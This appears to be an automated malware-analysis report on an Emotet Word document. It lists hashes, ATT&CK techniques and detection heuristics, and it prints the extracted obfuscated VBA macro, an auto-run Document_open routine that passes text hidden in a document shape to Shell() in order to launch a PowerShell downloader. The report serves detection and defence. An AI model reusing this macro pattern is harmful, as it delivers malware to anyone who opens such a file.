Emotet Office (OLE) malware analysis — malicious · ff75dbd9b1ca0614

MALICIOUS

Office (OLE)

66.4 KB Created: 2018-11-08 20:38:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 80365b4dedb0f1fa2860ea5ea87a6fa0 SHA-1: c6e74fc139450a168342fe8ddefeda976773886e SHA-256: ff75dbd9b1ca0614fa39637d69651e9397605569bc30d243e8a417df8fbe4573

270 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize the Shell() function to execute a command. This command constructs and executes a PowerShell command that decodes a Base64 string, decompresses it, and then executes the resulting script. This script appears to be designed to download and execute a second-stage payload, as indicated by the use of PowerShell and the suspicious command construction.

Heuristics 8

ClamAV: Doc.Malware.00536d-6923157-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6923157-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

   FormatNumber (NwZndj + vNpzVi + mtrpo + lqouJi)
UphFFKLs = Shell("" + ZLaCoS + CShCaMf + Shapes(uvLFtVa + XHidu + 1 + XoiZSt + KoWGiLdI).TextFrame.TextRange.Text + oJQSfqz + vfEYXFn, 185453450 - 185453450)
   Error (mrZbTW + jjwtHS / mFqhPH + suJCw + KklrN + IPpbww + tQiQb + YnGiw + DpWuz + ZWzkw / (FjUKVz + rjwNvN + hqYkEB + ZJzlVr))

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1012 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1012 bytes
SHA-256: `358a14e63af333e49c8256fd8c48ecd29d593d30dec86232bae41e83008d61ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IobmwOjEScajS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next Error ZznvP + YpDftW * UHDdJq + jmwJnw + JiqiTA + zRowd + ouqiQ + YMpjN FormatDateTime BjmCd + QKPHM + ZWKWp + ffjHp - (OsVaVU + dwzwlL) FormatNumber (fXCoJ + jKUdw + GUiUf + hXQcts - (MktNKp + hwmrqL)) FormatNumber (NwZndj + vNpzVi + mtrpo + lqouJi) UphFFKLs = Shell("" + ZLaCoS + CShCaMf + Shapes(uvLFtVa + XHidu + 1 + XoiZSt + KoWGiLdI).TextFrame.TextRange.Text + oJQSfqz + vfEYXFn, 185453450 - 185453450) Error (mrZbTW + jjwtHS / mFqhPH + suJCw + KklrN + IPpbww + tQiQb + YnGiw + DpWuz + ZWzkw / (FjUKVz + rjwNvN + hqYkEB + ZJzlVr)) FormatDateTime (BvKAM + uFwUs + twEzGT + EJoZqJ + TGQwBv + GHfVn) * DYarfj + CjAaRm + zONVTq + toozS End Sub

SHA-256: 358a14e63af333e49c8256fd8c48ecd29d593d30dec86232bae41e83008d61ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IobmwOjEScajS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   Error ZznvP + YpDftW * UHDdJq + jmwJnw + JiqiTA + zRowd + ouqiQ + YMpjN
   FormatDateTime BjmCd + QKPHM + ZWKWp + ffjHp - (OsVaVU + dwzwlL)
   FormatNumber (fXCoJ + jKUdw + GUiUf + hXQcts - (MktNKp + hwmrqL))
   FormatNumber (NwZndj + vNpzVi + mtrpo + lqouJi)
UphFFKLs = Shell("" + ZLaCoS + CShCaMf + Shapes(uvLFtVa + XHidu + 1 + XoiZSt + KoWGiLdI).TextFrame.TextRange.Text + oJQSfqz + vfEYXFn, 185453450 - 185453450)
   Error (mrZbTW + jjwtHS / mFqhPH + suJCw + KklrN + IPpbww + tQiQb + YnGiw + DpWuz + ZWzkw / (FjUKVz + rjwNvN + hqYkEB + ZJzlVr))
   FormatDateTime (BvKAM + uFwUs + twEzGT + EJoZqJ + TGQwBv + GHfVn) * DYarfj + CjAaRm + zONVTq + toozS
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.